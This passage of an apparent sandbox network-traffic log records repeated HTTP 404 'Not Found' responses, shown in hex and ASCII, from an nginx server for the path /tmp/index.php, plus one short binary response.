request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 